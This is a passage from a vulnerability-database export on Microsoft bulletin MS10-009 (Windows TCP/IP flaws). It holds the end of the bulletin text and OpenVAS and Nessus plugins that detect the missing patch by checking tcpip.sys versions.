TCP SACK values.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. 
Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nSumit Gwalani, Drew Hintz, and Neel Mehta of Google Security Team for reporting the ICMPv6 Router Advertisement Vulnerability (CVE-2010-0239)\r\n\u2022\t\r\n\r\nSumit Gwalani, Drew Hintz, and Neel Mehta of Google Security Team for reporting the Header MDL Fragmentation Vulnerability (CVE-2010-0240)\r\n\u2022\t\r\n\r\nSumit Gwalani, Drew Hintz, and Neel Mehta of Google Security Team for reporting the ICMPv6 Route Information Vulnerability (CVE-2010-0241)\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. 
There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (February 9, 2010): Bulletin published.", "modified": "2010-02-09T00:00:00", "published": "2010-02-09T00:00:00", "id": "SECURITYVULNS:DOC:23198", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23198", "title": "Microsoft Security Bulletin MS10-009 - Critical Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (974145)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "description": "Multiple memory corruptions in ICMPv6, IPSec, TCP implementations.", "modified": "2010-02-10T00:00:00", "published": "2010-02-10T00:00:00", "id": "SECURITYVULNS:VULN:10601", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10601", "title": "Microsoft Windows TCP/IP and TCP/IPv6 multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": 
"2019-05-29T18:40:07", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-009.", "modified": "2019-05-03T00:00:00", "published": "2010-11-25T00:00:00", "id": "OPENVAS:1361412562310801479", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801479", "title": "Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801479\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2010-11-25 08:29:59 +0100 (Thu, 25 Nov 2010)\");\n script_cve_id(\"CVE-2010-0239\", \"CVE-2010-0240\", \"CVE-2010-0241\",\n \"CVE-2010-0242\");\n script_bugtraq_id(38061, 38062, 38063, 38064);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/38506/\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/0342\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/bulletin/ms10-009.mspx\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary\n code with system privileges. 
Failed exploit attempts will likely result in\n denial-of-service conditions.\");\n script_tag(name:\"affected\", value:\"Microsoft Windows Vista Service Pack 1/2 and prior.\n Microsoft Windows Server 2008 Service Pack 1/2 and prior.\");\n script_tag(name:\"insight\", value:\"The flaws are due to Windows TCP/IP stack,\n\n - not performing the appropriate level of bounds checking on specially crafted\n 'ICMPv6' Router Advertisement packets.\n\n - fails to properly handle malformed Encapsulating Security Payloads (ESP) over\n UDP datagram fragments while running a custom network driver that splits the\n UDP header into multiple MDLs, which could be exploited by remote attackers\n to execute arbitrary code by sending specially crafted IP datagram fragments\n to a vulnerable system.\n\n - not performing the appropriate level of bounds checking on specially crafted\n ICMPv6 Route Information packets, which could be exploited by remote\n attackers to execute arbitrary code by sending specially crafted ICMPv6\n packets to a vulnerable system.\n\n - not properly handling TCP packets with a malformed selective acknowledgment\n (SACK) value.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS10-009.\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, win2008:3) <= 0){\n exit(0);\n}\n\nif(hotfix_missing(name:\"974145\") == 0){\n exit(0);\n}\n\nsysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\",\n item:\"PathName\");\nif(!sysPath){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:sysPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\",\n string:sysPath + \"\\System32\\drivers\\tcpip.sys\");\n\nsysVer = GetVer(file:file, share:share);\nif(!sysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(winVista:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18377\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.18160\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18377\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.18160\")){\n security_message( port: 0, data: \"The target host was 
found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:57", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-009.", "modified": "2017-02-20T00:00:00", "published": "2010-11-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=801479", "id": "OPENVAS:801479", "title": "Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms10-009.nasl 5364 2017-02-20 13:26:07Z cfi $\n#\n# Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow remote attackers to execute arbitrary\n code with system privileges. 
Failed exploit attempts will likely result in\n denial-of-service conditions.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft Windows Vista Service Pack 1/2 and prior.\n Microsoft Windows Server 2008 Service Pack 1/2 and prior.\";\ntag_insight = \"The flaws are due to Windows TCP/IP stack,\n - not performing the appropriate level of bounds checking on specially crafted\n 'ICMPv6' Router Advertisement packets.\n - fails to properly handle malformed Encapsulating Security Payloads (ESP) over\n UDP datagram fragments while running a custom network driver that splits the\n UDP header into multiple MDLs, which could be exploited by remote attackers\n to execute arbitrary code by sending specially crafted IP datagram fragments\n to a vulnerable system.\n - not performing the appropriate level of bounds checking on specially crafted\n ICMPv6 Route Information packets, which could be exploited by remote\n attackers to execute arbitrary code by sending specially crafted ICMPv6\n packets to a vulnerable system.\n - not properly handling TCP packets with a malformed selective acknowledgment\n (SACK) value.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/ms10-009.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS10-009.\";\n\nif(description)\n{\n script_id(801479);\n script_version(\"$Revision: 5364 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 14:26:07 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-25 08:29:59 +0100 (Thu, 25 Nov 2010)\");\n script_cve_id(\"CVE-2010-0239\", \"CVE-2010-0240\", \"CVE-2010-0241\",\n \"CVE-2010-0242\");\n script_bugtraq_id(38061, 38062, 38063, 38064);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", 
value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/38506/\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/0342\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/bulletin/ms10-009.mspx\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, win2008:3) <= 0){\n exit(0);\n}\n\n## Check Hotfix MS10-009\nif(hotfix_missing(name:\"974145\") == 0){\n exit(0);\n}\n\n## Get System Path\nsysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\",\n item:\"PathName\");\nif(!sysPath){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:sysPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\",\n string:sysPath + \"\\System32\\drivers\\tcpip.sys\");\n\n## Get File Version\nsysVer = GetVer(file:file, share:share);\nif(!sysVer){\n exit(0);\n}\n\n# Windows Vista\nif(hotfix_check_sp(winVista:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for tcpip.sys version < 6.0.6001.18377\n 
if(version_is_less(version:sysVer, test_version:\"6.0.6001.18377\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for tcpip.sys version < 6.0.6002.18160\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.18160\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows Server 2008\nelse if(hotfix_check_sp(win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep tcpip.sys version < 6.0.6001.18377\n if(version_is_less(version:sysVer, test_version:\"6.0.6001.18377\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for tcpip.sys version < 6.0.6002.18160\n if(version_is_less(version:sysVer, test_version:\"6.0.6002.18160\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-12-13T09:17:56", "bulletinFamily": "scanner", "description": "The remote Windows host has the following vulnerabilities in its\nTCP/IP implementation :\n\n - Hosts with IPv6 enabled perform insufficient bounds\n checking when processing specially crafted ICMPv6 Router\n Advertisement packets. A remote attacker could exploit\n this to execute arbitrary code. (CVE-2010-0239)\n\n - Specially crafted Encapsulating Security Payloads (ESP)\n are not processed properly. A remote attacker could\n exploit this to execute arbitrary code. (CVE-2010-0240)\n\n - Hosts with IPv6 enabled perform insufficient bounds\n checking when processing specially crafted ICMPv6 Route\n Information packets. A remote attacker could exploit\n this to execute arbitrary code. (CVE-2010-0241)\n\n - Specially crafted TCP packets with a malformed\n selective acknowledgment (SACK) value can cause the\n system to stop responding and automatically restart. 
A\n remote attacker could exploit this to cause a denial of\n service. (CVE-2009-0242)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS10-009.NASL", "href": "https://www.tenable.com/plugins/nessus/44419", "published": "2010-02-09T00:00:00", "title": "MS10-009: Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (974145)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44419);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2010-0239\", \"CVE-2010-0240\", \"CVE-2010-0241\", \"CVE-2010-0242\");\n script_bugtraq_id(38061, 38062, 38063, 38064);\n script_xref(name:\"IAVA\", value:\"2010-A-0030\");\n script_xref(name:\"MSFT\", value:\"MS10-009\");\n script_xref(name:\"MSKB\", value:\"974145\");\n\n script_name(english:\"MS10-009: Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (974145)\");\n script_summary(english:\"Checks version of tcpip.sys\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has multiple vulnerabilities in its TCP/IP\nimplementation.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Windows host has the following vulnerabilities in its\nTCP/IP implementation :\n\n - Hosts with IPv6 enabled perform insufficient bounds\n checking when processing specially crafted ICMPv6 Router\n Advertisement packets. A remote attacker could exploit\n this to execute arbitrary code. (CVE-2010-0239)\n\n - Specially crafted Encapsulating Security Payloads (ESP)\n are not processed properly. A remote attacker could\n exploit this to execute arbitrary code. (CVE-2010-0240)\n\n - Hosts with IPv6 enabled perform insufficient bounds\n checking when processing specially crafted ICMPv6 Route\n Information packets. A remote attacker could exploit\n this to execute arbitrary code. 
(CVE-2010-0241)\n\n - Specially crafted TCP packets with a malformed\n selective acknowledgment (SACK) value can cause the\n system to stop responding and automatically restart. A\n remote attacker could exploit this to cause a denial of\n service. (CVE-2009-0242)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-009\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows Vista and 2008.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(94, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-009';\nkbs = make_list(\"974145\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'0,2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nkb = \"974145\";\n\nif (\n # Vista SP0 (x86 & x64)\n hotfix_is_vulnerable(os:\"6.0\", file:\"Tcpip.sys\", version:\"6.0.6000.16973\", min_version:\"6.0.6000.0\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", file:\"Tcpip.sys\", version:\"6.0.6000.21175\", min_version:\"6.0.6000.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2k8 SP1 (x86 & x64)\n hotfix_is_vulnerable(os:\"6.0\", file:\"Tcpip.sys\", version:\"6.0.6001.18377\", min_version:\"6.0.6001.0\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", file:\"Tcpip.sys\", version:\"6.0.6001.22577\", min_version:\"6.0.6001.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2k8 SP2 (x86 & x64)\n hotfix_is_vulnerable(os:\"6.0\", file:\"Tcpip.sys\", version:\"6.0.6002.18160\", min_version:\"6.0.6002.0\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", file:\"Tcpip.sys\", version:\"6.0.6002.22283\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb)\n)\n{\n 
set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:58:04", "bulletinFamily": "scanner", "description": "According to the version number obtained by NTLM the\nremote host has Windows Server 2008 installed. The host\nmay be vulnerable to a number of vulnerabilities including\nremote unauthenticated code execution.", "modified": "2019-12-02T00:00:00", "id": "WIN_SERVER_2008_NTLM_PCI.NASL", "href": "https://www.tenable.com/plugins/nessus/108811", "published": "2018-04-03T00:00:00", "title": "Windows Server 2008 Critical RCE Vulnerabilities (uncredentialed) (PCI/DSS)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108811);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2008-0015\",\n \"CVE-2008-0020\",\n \"CVE-2008-4038\",\n \"CVE-2008-4114\",\n \"CVE-2008-4250\",\n \"CVE-2008-4609\",\n \"CVE-2008-4835\",\n \"CVE-2009-0086\",\n \"CVE-2009-0089\",\n \"CVE-2009-0550\",\n \"CVE-2009-0901\",\n \"CVE-2009-1925\",\n \"CVE-2009-1926\",\n \"CVE-2009-1930\",\n \"CVE-2009-2493\",\n \"CVE-2009-2494\",\n \"CVE-2009-2505\",\n \"CVE-2009-3676\",\n \"CVE-2009-3677\",\n \"CVE-2009-3678\",\n \"CVE-2010-0020\",\n \"CVE-2010-0021\",\n \"CVE-2010-0022\",\n \"CVE-2010-0231\",\n \"CVE-2010-0239\",\n \"CVE-2010-0240\",\n \"CVE-2010-0241\",\n \"CVE-2010-0242\",\n \"CVE-2010-0269\",\n \"CVE-2010-0270\",\n \"CVE-2010-0476\",\n \"CVE-2010-0477\",\n \"CVE-2010-1263\",\n \"CVE-2010-2550\",\n \"CVE-2010-2551\",\n \"CVE-2010-2552\"\n );\n script_bugtraq_id(\n 31179,\n 31545,\n 31647,\n 31874,\n 33121,\n 33122,\n 34435,\n 34437,\n 34439,\n 35558,\n 35585,\n 35828,\n 35832,\n 35982,\n 35993,\n 36265,\n 36269,\n 
36989,\n 37197,\n 37198,\n 38049,\n 38051,\n 38054,\n 38061,\n 38062,\n 38063,\n 38064,\n 38085,\n 39312,\n 39336,\n 39339,\n 39340,\n 40237,\n 40574,\n 42224,\n 42263,\n 42267\n );\n script_xref(name:\"CERT\", value:\"827267\");\n script_xref(name:\"IAVA\", value:\"2008-A-0081\");\n script_xref(name:\"IAVA\", value:\"2009-A-0077\");\n script_xref(name:\"IAVA\", value:\"2009-A-0126\");\n script_xref(name:\"IAVA\", value:\"2010-A-0030\");\n script_xref(name:\"IAVB\", value:\"2009-B-0037\");\n script_xref(name:\"CERT\", value:\"180513\");\n script_xref(name:\"CERT\", value:\"456745\");\n script_xref(name:\"EDB-ID\", value:\"6463\");\n script_xref(name:\"EDB-ID\", value:\"6824\");\n script_xref(name:\"EDB-ID\", value:\"7104\");\n script_xref(name:\"EDB-ID\", value:\"7132\");\n script_xref(name:\"EDB-ID\", value:\"9108\");\n script_xref(name:\"EDB-ID\", value:\"16615\");\n script_xref(name:\"EDB-ID\", value:\"14607\");\n script_xref(name:\"MSFT\", value:\"MS08-063\");\n script_xref(name:\"MSFT\", value:\"MS08-067\");\n script_xref(name:\"MSFT\", value:\"MS09-001\");\n script_xref(name:\"MSFT\", value:\"MS09-013\");\n script_xref(name:\"MSFT\", value:\"MS09-037\");\n script_xref(name:\"MSFT\", value:\"MS09-042\");\n script_xref(name:\"MSFT\", value:\"MS09-048\");\n script_xref(name:\"MSFT\", value:\"MS09-071\");\n script_xref(name:\"MSFT\", value:\"MS10-009\");\n script_xref(name:\"MSFT\", value:\"MS10-012\");\n script_xref(name:\"MSFT\", value:\"MS10-020\");\n script_xref(name:\"MSFT\", value:\"MS10-043\");\n script_xref(name:\"MSFT\", value:\"MS10-054\");\n script_xref(name:\"MSFT\", value:\"MS10-083\");\n script_xref(name:\"MSKB\", value:\"957095\");\n script_xref(name:\"MSKB\", value:\"958644\");\n script_xref(name:\"MSKB\", value:\"958687\");\n script_xref(name:\"MSKB\", value:\"960803\");\n script_xref(name:\"MSKB\", value:\"967723\");\n script_xref(name:\"MSKB\", value:\"960859\");\n script_xref(name:\"MSKB\", value:\"973354\");\n script_xref(name:\"MSKB\", 
value:\"973507\");\n script_xref(name:\"MSKB\", value:\"973540\");\n script_xref(name:\"MSKB\", value:\"973815\");\n script_xref(name:\"MSKB\", value:\"973869\");\n script_xref(name:\"MSKB\", value:\"974318\");\n script_xref(name:\"MSKB\", value:\"971468\");\n script_xref(name:\"MSKB\", value:\"974145\");\n script_xref(name:\"MSKB\", value:\"980232\");\n script_xref(name:\"MSKB\", value:\"979687\");\n script_xref(name:\"MSKB\", value:\"982214\");\n script_xref(name:\"MSKB\", value:\"2032276\");\n\n script_name(english:\"Windows Server 2008 Critical RCE Vulnerabilities (uncredentialed) (PCI/DSS)\");\n script_summary(english:\"Checks the OS version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host may allow remote code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version number obtained by NTLM the\nremote host has Windows Server 2008 installed. The host\nmay be vulnerable to a number of vulnerabilities including\nremote unauthenticated code execution.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Ensure the appropriate patches have been applied.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:ND/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:X/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2008-4038\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 20, 94, 119, 189, 255, 264, 287, 310, 362, 399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smtp_ntlm_info.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"Settings/PCI_DSS\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\ninclude(\"audit.inc\");\n\nif 